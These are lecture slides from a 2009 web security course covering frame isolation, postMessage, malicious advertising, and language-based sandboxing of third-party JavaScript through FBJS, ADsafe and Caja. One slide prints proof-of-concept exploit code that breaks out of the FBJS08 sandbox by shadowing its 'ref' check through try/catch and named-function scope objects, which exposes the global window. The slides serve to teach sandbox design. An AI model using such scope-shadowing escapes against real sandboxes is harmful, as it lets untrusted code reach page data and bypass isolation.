Mashups and Language-Based Isolation

John Mitchell

CS 142 Winter 2009

Mashups

Advertisements

Social Networking Sites

Third-party content: Ads

Customer accounts

Advertising network

Third-party content: Apps

User data

User-supplied application

Why Use Frames

Isolation: Different frames can represent different principals. Same-origin policy: a frame can only read or modify frames from the same scheme/host/port.

Delegation: A frame can draw only on its own rectangle.

Modularity: Reuse the same content in multiple places.

Failure containment: The parent may work even if a frame is slow to load or broken.

src = 7.gmodules.com/...
name = remote_iframe_7

src = google.com/…
name = awglogin
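
The same-origin rule above compares three components of a URL. A minimal sketch of that comparison, assuming the standard URL class (available in current browsers and in Node.js). The helper names originOf and sameOrigin and the http scheme in the usage note are illustrative assumptions, not part of the lecture, and real browsers apply further rules that this sketch ignores.

```javascript
// Illustrative helpers (hypothetical names): compare scheme, host, and port.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

function originOf(urlString) {
  const u = new URL(urlString);
  // URL.port is "" when the port is the default for the scheme,
  // so fill in the default to make the comparison explicit.
  const port = u.port || DEFAULT_PORTS[u.protocol] || "";
  return u.protocol + "//" + u.hostname + ":" + port;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}
```

Under these assumptions, sameOrigin("http://google.com/", "http://7.gmodules.com/") is false, which is why the two frames shown above cannot read or modify each other.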

Why Not To Use Frames

Inconvenient: Container does not fit content. Quirky browser behavior (history, sound). Performance impact.

Security concerns: Frame hijacking. Browser exploits.

Inability to Communicate

Cannot send messages to cross-domain frames

Alternatives: Flash; rewriting (FBJS, ADsafe, Caja)

postMessage

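// Sender: post to the first child frame and name the origin allowed to receive it.
// "http://example.com" is a placeholder origin.
frames[0].postMessage("Hello world.", "http://example.com");

// Receiver: accept messages only from the expected origin, then reply to the sender.
window.addEventListener("message", receiver);
function receiver(e) {
  if (e.origin === "http://example.com") {
    if (e.data === "Hello world.")
      e.source.postMessage("Hello", e.origin);
  }
}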

Referer Suppression Experiment

Measure how often Referer is suppressed

Placed a JavaScript advertisement for $200

283,945 impressions

Remember this from Lecture 12 by Collin?

How does this work?

[Figure: Advertiser, Ad Network, Publisher, and Browser, with the Ad placed alongside the publisher's Content in the page; an Ad Server is also shown.]

Can retrieve “image” that is part of ad

“Zero-click attacks”

Clients vulnerable

Malware can attack browser implementation errors

Browser-resident malware can use intended functionality to carry out malicious attacks

Easy to place: $30 in advertisements, reach 50,000 browsers

Brian Krebs on Computer Security

Hackers Exploit Adobe Reader Flaw

Security Fix has learned that … security hole in … Adobe Reader … is actively being exploited to break into Microsoft Windows computers. According to information released Friday by iDefense, … Web site administrators … spotted hackers taking advantage of the flaw on Jan. 20, 2008, when tainted banner ads were identified that served specially crafted Acrobat PDF files designed to exploit the hole and install malicious software.

Ad serves PDF file that installs Zonebac, modifies search engine results

Problems with advertisements

Ad network, publisher have incentives to show ads

Could place ads in iframe

Rules out more profitable floating ads, etc.

Ad network and publisher can try to screen ads

Yahoo! AdSafe

Google Caja

Some limitations in current web

Ads may contain links to “images” that are part of ad

Important to remember

This is a very effective way to reach victims: $30-50 per 1000

User does not have to click on anything to run malicious code

Sandbox

A safe place for kids to play without hurting each other or anyone else

Possible approach

Goal: Write a static analyzer to check untrusted JavaScript and determine if it is malicious

Solvable? Very difficult because of functions that can convert strings to code and vice versa, e.g., eval

More likely to have a solution: Find a well-defined and meaningful subset of JavaScript for which this is solvable. Prohibit problematic functions like eval

Some JavaScript examples

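Use of this inside functions

var b = 10;
var f = function() {
  var b = 5;
  function g() { var b = 8; return this.b; }
  // g is called as a plain function, so in non-strict browser code
  // this is the global object, where the top-level var b lives
  return g();
};
var result = f(); // has as value 10

Implicit conversions

var y = "a";
var x = { toString: function() { return y; } };
x = x + 10; // implicit call to toString
js> "a10"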

Sometimes tricky

Which declaration of g is used?

var f = function() {
  var a = g();                        // function declarations are hoisted; the later one wins
  function g() { return 1; }
  function g() { return 2; }
  var g = function() { return 3; };   // this assignment runs only after a = g()
  return a;
};
var result = f(); // has as value 2

String computation of property names

for (p in o){....}, eval(...), o[s] allow strings to be used as code and vice versa

var m = "toS"; var n = "tring";
Object.prototype[m + n] = function() { return undefined; };
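
To see why computed property names matter for filtering, consider a filter that only searches the program text for a forbidden name. The sketch below is illustrative: the variable names and the choice of constructor as the forbidden property are assumptions, and new Function is used only to run the untrusted snippet for the demonstration.

```javascript
const forbidden = "constructor";

// Untrusted snippet: the forbidden name never appears as a single token.
const untrusted = 'var k = "con" + "structor"; return ({})[k];';

// A purely textual filter finds nothing to reject...
const passesTextFilter = !untrusted.includes(forbidden);

// ...yet running the snippet reads the forbidden property anyway.
const leaked = new Function(untrusted)();
```

Here passesTextFilter is true while leaked is the Object constructor, so a text-only filter is sound only for a subset of the language that excludes o[s]-style access.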

Facebook FBJS

Subset of JavaScript for Facebook applications

Application code is fetched from the publisher's (untrusted) server and embedded as a subtree of the page.

Not placed in an iframe.

Application code is statically checked to see if it is valid FBJS

FBJS code is rewritten and certain run-time checks are added

FBJS restrictions

Security goal: Restrict access to the Document Object Model (DOM) and the global object. Prevent clashes with other applications.

Method 1: Filtering. Forbid eval, with. Disallow explicit access (via the dot notation o.p) to the properties valueOf, __parent__, constructor.

Method 2: Rewriting. Add an application-specific prefix to all top-level identifiers. Example: o.p is renamed to a1234_o.p. This separates the effective namespace of an application from others.
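
The prefixing step can be sketched with a regular expression. This is a toy under stated assumptions, not Facebook's rewriter: the function names are hypothetical, the list of top-level identifiers is supplied by the caller, and a real rewriter would work on a parse tree so that string literals, comments, and object-literal keys are left alone.

```javascript
// Escape characters that are special in a regular expression
// (identifiers may legally contain "$").
function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Prefix every whole-word occurrence of the given names, except where the
// name follows a dot (there it is a property name, not an identifier).
function prefixIdentifiers(source, names, prefix) {
  if (names.length === 0) return source;
  const alternatives = names.map(escapeRegExp).join("|");
  const pattern = new RegExp("(?<![.\\w$])(" + alternatives + ")(?![\\w$])", "g");
  return source.replace(pattern, (match) => prefix + match);
}
```

For example, prefixIdentifiers("o.p = o.q + p;", ["o", "p"], "a1234_") renames the identifiers o and p but leaves the property names after the dots untouched, matching the o.p to a1234_o.p example above.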

More about FBJS08

Some details of rewriting:

this is rewritten to ref(this)

ref is a function defined by the host (Facebook) in the global object

ref(x) = x if x ≠ window, else ref(x) = null

Prevents application code from accessing the global object.

o[p] gets rewritten to o[idx(p)].

Returns error if p is a black-listed property, such as "__x__"

Facebook also provides libraries, accessible within the application namespace, that allow applications to safely access certain parts of the global object.
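
The two run-time checks described above can be sketched as follows. This is an illustration of the idea, not Facebook's code: globalThis stands in for window so that the sketch also runs outside a browser, and the contents of the blacklist are a hypothetical choice drawn from the properties named in the filtering rules.

```javascript
// Stand-in for the browser's window object.
const globalObject = globalThis;

// ref(x) = x if x is not the global object, otherwise null.
function ref(x) {
  return x === globalObject ? null : x;
}

// Hypothetical blacklist; the actual FBJS list is not given in these notes.
const BLACKLIST = new Set(["__parent__", "constructor", "valueOf"]);

// idx(p) returns the property name if it is allowed and signals an error otherwise.
function idx(p) {
  const name = String(p); // convert once, so a tricky toString cannot change the answer later
  if (BLACKLIST.has(name)) {
    throw new Error("forbidden property: " + name);
  }
  return name;
}
```

With these definitions, a rewritten access o[idx(p)] fails before the lookup when p names a blacklisted property, and ref(this) yields null whenever this is the global object.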

Problem with FBJS08

Attack: Get a handle to the global object in the application code

Almost works:

var getthis = function() { return this; };

Except that this gets rewritten to ref(this) and the code returns null.

But we can redefine ref itself

ref is defined in the global object, and application code is disallowed from having a handle to the global object

But can define a local ref in a local scope and defeat FBJS08

try { throw (function() { return this; }); } catch (f) { curr_scp = f(); }

Exploit code (now fixed!)

<a href="#" onclick="a()">Test A (Firefox and Safari)</a>
<script>
var get_win = function get_scope(x) {
  if (x==0) { return this }
  else { get_scope(0).ref = function(x){ return x }; return get_win(0) }
};
function a() { get_win(1).alert("Hacked!") }
</script>

<a href="#" onclick="b()">Test B (Safari, Opera and Chrome)</a>
<script>
function b() {
  try { throw (function(){ return this }); }
  catch (get_scope) { get_scope().ref = function(x){ return x }; this.alert("Hacked!") }
}
</script>

Attack 1

ECMA-262 (3rd edition) semantics for try{...} catch(f){...} say that whenever an exception is thrown:

A new object o is created with property f pointing to the exception object

o is placed on top of the scope chain (o does not have activation object status).

The "this" of a function not defined in an activation object is the object containing it. In the code above, this for get_scope resolves to o.

Shadow the original ref by redefining it in o.

try { throw (function(){ return this }); } catch (get_scope) { get_scope().ref = function(x){ return x }; }
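
The shadowing step can be modeled with plain objects standing in for scope objects. This is a model of the scope-chain lookup described above, not a reproduction of the exploit: later editions of the standard changed how the catch scope is represented, so current engines do not hand out the object o. All names here (lookup, globalScope, scopeChain) are hypothetical.

```javascript
// Model identifier lookup: search scope objects from innermost to outermost.
function lookup(scopeChain, name) {
  for (const scope of scopeChain) {
    if (Object.prototype.hasOwnProperty.call(scope, name)) {
      return scope[name];
    }
  }
  throw new ReferenceError(name + " is not defined");
}

// The host defines ref in the (modeled) global object.
const globalScope = {};
globalScope.ref = (x) => (x === globalScope ? null : x);

// The catch clause pushes a fresh object o on top of the scope chain.
const o = {};
const scopeChain = [o, globalScope];

// Before the attack, ref resolves to the host's function and hides the global object.
const before = lookup(scopeChain, "ref")(globalScope);

// The attacker obtains o and defines an identity function named ref on it.
o.ref = (x) => x;

// Now ref resolves to the attacker's function, and the global object leaks.
const after = lookup(scopeChain, "ref")(globalScope);
```

In this model, before is null and after is the global scope object: the host's check is still present, but it is no longer the function that the name ref resolves to.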

Attack 2

ECMA-262 says that whenever a named recursive function f is created, the internal scope chain (fscp) of the function (the environment pointer of the closure) is set to the current lexical scope with a dummy object (of) placed on top.

var get_window = function f(x) { if (x === 0) { return this; } else { return f(x - 1); } };

Attack 2

When the function f is called, the current scope chain is replaced with fscp and an activation object for f is placed on top of it

Every recursive call to f will resolve to property f of the dummy object of (which is not an activation object)

Accessing this inside f will resolve to of

Shadow the original ref by redefining it in of

var get_window = function f(x) { if (x === 0) { return this; } else { return f(x - 1); } };

What is possible?

Filtering principle: Subset of JavaScript in which, if a program accesses property p, either p appears textually in the program or p is from a list of “implicit” properties

Isolation principle 1: Subset of JavaScript with semantics-preserving, capture-avoiding renaming of identifiers (except names of predefined properties)

Isolation principle 2: Subset of JavaScript in which no program can access any scope object

Isolation principle 3: Given lists of forbidden properties PnoW and PnoRW, a program cannot write properties in PnoW and cannot read or write properties in PnoRW

Rewriting principles: Achieve some forms of isolation by restricting semantics

Isolation of property names (Jt)

Goal: All property names that get accessed must appear textually in the code

If the program does not contain eval, Function, o[..], etc., which convert strings to code, then any property accessed is either in the code or an implicit property access: toString, toNumber, valueOf, length, prototype, constructor, message, arguments, Object, Array

Application: If we want to prevent access to certain properties, restrict to this sublanguage Jt and inspect the code
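
The "restrict and inspect" application can be sketched as a two-step check. This is a conservative toy, not the analysis from the lecture: the function names and the result shape are hypothetical, tokens are found with regular expressions rather than a parser (so names inside strings and comments are also flagged, and array literals are rejected along with bracket access), and the implicit properties listed above would still have to be considered separately.

```javascript
// Constructs excluded from the sublanguage in this sketch (string-to-code conversions).
const EXCLUDED = /\b(eval|Function)\b|\[/;

// Every identifier-like token in the text is a candidate property name.
function propertyNamesInText(source) {
  return new Set(source.match(/[A-Za-z_$][\w$]*/g) || []);
}

// Step 1: reject programs outside the sublanguage.
// Step 2: reject programs whose text mentions a forbidden property.
function checkUntrusted(source, forbiddenProps) {
  if (EXCLUDED.test(source)) {
    return { ok: false, reason: "uses eval, Function, or bracket access" };
  }
  const names = propertyNamesInText(source);
  const hits = forbiddenProps.filter((p) => names.has(p));
  return hits.length === 0
    ? { ok: true, reason: "" }
    : { ok: false, reason: "mentions forbidden property: " + hits.join(", ") };
}
```

For instance, with cookie as the forbidden property, document.cookie is rejected in step 2 and document["coo" + "kie"] is rejected in step 1, while a program that only reads o.title passes.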

Isolating scope objects (Js)

How can code in subset Jt access scope objects?

Identifier this

Object.prototype.valueOf, Array.prototype.sort/concat/reverse can implicitly access this

Define subset Js of Jt: Prohibit this, valueOf, sort, concat and reverse

Properties of Js

Programs cannot access scope objects

Can rename variables; variable names can never be accessed (explicitly) as properties

But not variables with the same name as native properties

Example:

Security goal: Restrict access to the Document Object Model (DOM) and the global object

Method 1: Filtering. Forbid eval, with, ...

Method 2: Require special program idioms. Access property p of object o by calling ADSAFE.get(o, p)

Subtlety:

AdSafe restriction: "All interaction with the trusted code must happen only using the methods in the ADSafe object."

This may not be possible!

// Somewhere in trusted code
Object.prototype.toString = function() { ... };
...
// Untrusted code
var o = {};
o = o + " "; // converts o to String

Bottom line: need to restrict definitions that occur in trusted code

Possible approach

Analyze the library of the host page

Compute a blacklist PnoRW of security-critical properties that could lead to a security breach (How?)

Use subset Js + filter for PnoRW

Conclusion

Modern sites incorporate third-party content: advertisements, applications

Third-party content must be isolated, or everyone is exposed to easy malicious attacks

Two basic approaches: use a browser mechanism, such as iframes; or filter, rewrite, and restrict execution of untrusted content

Language-based sandboxing is tricky: subtle problems with recent methods; progress on reliable foundations is possible

Web Advertising

Deliver advertisements to viewers via Web

More effective and more profitable if user profile is known

Source: U Texas iSchool student study, www.ischool.utexas.edu/~i385e/studentsPPT/fogle_IA&WebAdv.ppt

Web ad placement and type

Ad positions

Dark orange (strong), light yellow (weak)

Ads near rich content and navigation, and at the top-left do better

Ad types: Banner, Sidebar, Pop-ups, Pop-unders, Floating, Unicast

Banner

HTML code loads a specific website

Varies in content and shape

Horizontal

50 cents/ 1000

Sidebar

Skyscraper

Vertical

2-3 times larger than banner

Harder to scroll it off page

$1.00 - $1.50/ 1000

Pop-ups

Opens in its own window

Obscures the page you're viewing

Forced to close or move it

Pop-unders

Opens under the content you're viewing

Less intrusive than pop-up

Both are more effective than banner

Banners: 2-5 clicks/ 1000

Pop-ups: 30 clicks/ 1000

Can cost 4-10 times more than banner

Floating

Float or fly over page 5-30s

Obscure view; block mouse input

Gets attention: animation & sound

Powerful branding tool - hard to ignore

30 clicks/1000

$3 - $30/ 1000

Unicast

TV commercials that run in pop-up

10-30s

Same branding power as TV commercial + being able to go to website

50 clicks/1000

$30/1000

From AOL.com

Web Publishing and Advertising

[Figure: Advertiser, Ad Network, Publisher, and Browser, relabeled as Attacker, Intermediary, Intermediary, and Victim; the Ad is placed alongside the publisher's Content in the page.]
